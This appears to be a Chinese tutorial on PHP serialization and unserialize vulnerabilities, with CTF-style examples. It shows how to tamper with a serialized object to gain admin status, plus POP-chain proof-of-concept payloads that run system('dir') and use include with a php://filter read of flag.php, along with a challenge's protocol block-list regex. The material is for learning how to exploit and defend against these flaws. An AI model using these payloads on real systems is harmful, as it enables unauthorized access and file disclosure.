一、PHP 序列化

1、对象的序列化

php"><?php
class people{public $name='Gaming';private $Nation='Liyue';protected $Birthday='12/22';public function say(){echo "老板你好呀，我是和记厅的镖师，叫我嘉明就行，要运货吗你？";}
}
$Gaming=new people();
echo $Gaming->name;
echo '<br>';
$a=serialize($Gaming);  //将 对象 $Gaming 序列化为 字符串
echo $a;
echo '<br>';
$c=urlencode($a);       //将 字符串 $a 进行 url 编码
echo $c;

运行：

Gaming O:6:"people":3:{s:4:"name";s:6:"Gaming";s:14:"peopleNation";s:5:"Liyue";s:11:"*Birthday";s:5:"12/22";} O%3A6%3A%22people%22%3A3%3A%7Bs%3A4%3A%22name%22%3Bs%3A6%3A%22Gaming%22%3Bs%3A14%3A%22%00people%00Nation%22%3Bs%3A5%3A%22Liyue%22%3Bs%3A11%3A%22%00%2A%00Birthday%22%3Bs%3A5%3A%2212%2F22%22%3B%7D

O：（object）一个序列化的对象

6：类名的长度

3：类中有 3 个属性

s：（string）字符串

4：属性 长度

6：值 长度

2、数组的序列化

①、普通数组

php">$arr=array('Gaming','Chongyun');
echo serialize($arr);

运行：

> a:2:{i:0;s:6:"Gaming";i:1;s:8:"Chongyun";}

a：数组

2：2 个值

i：索引

0：第 0 个

②、关联数组

php"> $arr=array('name' => 'Chongyun','Nation' => 'Liyue','Birthday' => '9/7');echo serialize($arr);

运行：

a:3:{s:4:"name";s:8:"Chongyun";s:6:"Nation";s:5:"Liyue";s:8:"Birthday";s:3:"9/7";}

二、PHP 反序列化

php"> $Gaming=new people();echo $Gaming->name;echo '<br>';$a=serialize($Gaming);  //将 对象 $Gaming 序列化为 字符串echo $a;echo '<br>';echo '<br>';print_r(unserialize($a));echo '<br>';echo '<br>';var_dump(unserialize($a));

运行：

Gaming O:6:"people":3:{s:4:"name";s:6:"Gaming";s:14:"peopleNation";s:5:"Liyue";s:11:"*Birthday";s:5:"12/22";}

people Object ( [name] => Gaming [Nation:people:private] => Liyue [Birthday:protected] => 12/22 )

object(people)#2 (3) { ["name"]=> string(6) "Gaming" ["Nation":"people":private]=> string(5) "Liyue" ["Birthday":protected]=> string(5) "12/22" }

获得一个 序列化 的字符串 ：

O:6:"people":3:{s:4:"name";s:6:"Gaming";s:14:"peopleNation";s:5:"Liyue";s:11:"*Birthday";s:5:"12/22";}

手动添加 空字符

s:14:"%00people%00Nation";s:5:"Liyue";s:11:"%00*%00Birthday";

篡改字符串信息，反序列化后得到 篡改后的 对象 ：

php"> highlight_file(__FILE__);class User {public $username='lili';public $isAdmin=0;}​$userData = $_GET['data'];$user = unserialize($userData);if($user->isAdmin===1 && $user->username==='admin'){// 目标输出：欢迎你管理员~echo '欢迎你管理员~';}else{echo '你是一个普通用户！';}

编写脚本，得到序列化字符串

php">class User {public $username='admin';public $isAdmin=1;}​$user = new User();$serialized_data = serialize($user);echo $serialized_data;

GET 传参即可

三、pop链的构造

引入：

php">if(isset($_GET['test'])){@unserialize($_GET['test']);highlight_file(__FILE__);
}
else{$a=new test;
}

 POC 编写：

php">class  test{private $index;function __construct(){$this->index=new execute();}
}class execute{public  $test="system('dir');";
}
$a=new test();
echo urlencode(serialize($a));
```

例题： 

php">class Modifier {protected  $var;public function append($value){include($value);}public function __invoke(){$this->append($this->var);}
}
class Show{public $source;public $str;public function __construct($file='index.php'){$this->source = $file;echo 'Welcome to '.$this->source."<br>";}public function __toString(){return $this->str->source;}public function __wakeup(){if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {echo "hacker";$this->source = "index.php";}}
}
class Test{public $p;public function __construct(){$this->p = array();}public function __get($key){$function = $this->p;return $function();}
}
if(isset($_GET['pop'])){@unserialize($_GET['pop']);
}
else{$a=new Show;highlight_file(__FILE__);
}

 POC 构造：

php">class Modifier {protected  $var="flag.php"; #include函数使用为协议读取文件// protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";}class Test{public $p;}class Show{public $source;public $str;//将另一个对象赋值给属性需要使用构造函数。public function __construct(){$this->str =new Test();  // 触发 __get()}}$new_show = new Show();  // 触发 POP链中的 __construct()$new_show->source = new Show();  // 触发 __toString()$new_show->source->str->p = new Modifier();  // 触发 __invoke()echo urlencode(serialize($new_show));